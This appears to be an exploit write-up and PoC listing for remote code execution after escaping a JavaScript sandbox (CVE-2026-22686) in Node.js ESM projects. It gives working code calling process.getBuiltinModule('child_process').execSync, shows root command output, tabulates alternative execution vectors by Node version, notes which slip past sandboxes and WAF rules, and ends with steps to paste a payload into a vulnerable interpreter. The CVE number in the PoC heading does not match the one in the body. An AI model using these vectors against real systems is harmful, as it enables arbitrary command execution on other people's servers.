## https://sploitus.com/exploit?id=9EEC95A0-85D9-56B0-8E24-676B414B721D
## RCE in ESM Environments โ The `require` Problem
When achieving sandbox escape via CVE-2026-22686, executing OS commands in an
ESM project (`"type": "module"`) requires bypassing Node.js module loading restrictions.
Standard approaches fail for the following reasons:
| Vector | Result |
|--------|--------|
| `require('child_process')` | โ `require is not defined` โ not available in ESM |
| `process.mainModule.require(...)` | โ `Cannot read properties of undefined` โ `mainModule` is `undefined` in ESM |
| `import('child_process')` | โ `A dynamic import callback was not specified` โ requires a hook not configured in the sandbox |
| `process.binding('spawn_sync')` | โ ๏ธ Available but too low-level โ requires manual syscall construction |
---
## Solution: Process Enumeration โ `process.getBuiltinModule`
Instead of assuming a module loading method, we enumerate `process` keys directly
from the host context (already accessible after sandbox escape):
```javascript
return Object.keys(process)
```
Among the keys returned, `getBuiltinModule` was identified โ a **Node.js 22+ native API**
designed specifically to allow ESM modules to access built-in Node.js modules
**without `require` or `import()`**.
```javascript
process.getBuiltinModule('child_process').execSync('id').toString()
// โ uid=0(root) gid=0(root) groups=0(root) โ RCE confirmed
```
This is the **key insight**: `process.getBuiltinModule` is a relatively new API
(Node.js >= 22.3.0) and is frequently overlooked by sandbox implementations
and WAF rules that block `require` and `import`.
---
## Alternative Vectors (by Node.js version)
Depending on the target environment, other vectors may be available after
enumerating `process`:
| Vector | Node.js Version | Notes |
|--------|----------------|-------|
| `process.getBuiltinModule('child_process')` | >= 22.3.0 | โ Cleanest โ official ESM-safe API |
| `process.binding('spawn_sync')` | All | โ ๏ธ Low-level, requires manual buffer construction |
| `process.mainModule.require(...)` | CJS only | โ Undefined in ESM |
| `__non_webpack_require__` | Webpack bundles | โ ๏ธ Environment-specific |
| `Module.createRequire(import.meta.url)` | >= 12.2.0 | โ ๏ธ Needs `Module` reference from host |
| `process._linkedBinding('node_os')` | Internal builds | โ ๏ธ Rarely exposed |
> **Takeaway:** Always enumerate `Object.keys(process)` after achieving host
> context access. The available attack surface varies significantly by Node.js
> version and project configuration. `getBuiltinModule` is the most reliable
> vector in modern Node.js ESM environments.
# CVE-2026-2268-RemoteCodeExecution-RCE-PoC
Steps:
1. Insert your personal command
2. Paste the rersultant payload generated in your vulnerable js sandbox interpreter
3. Disfrut the results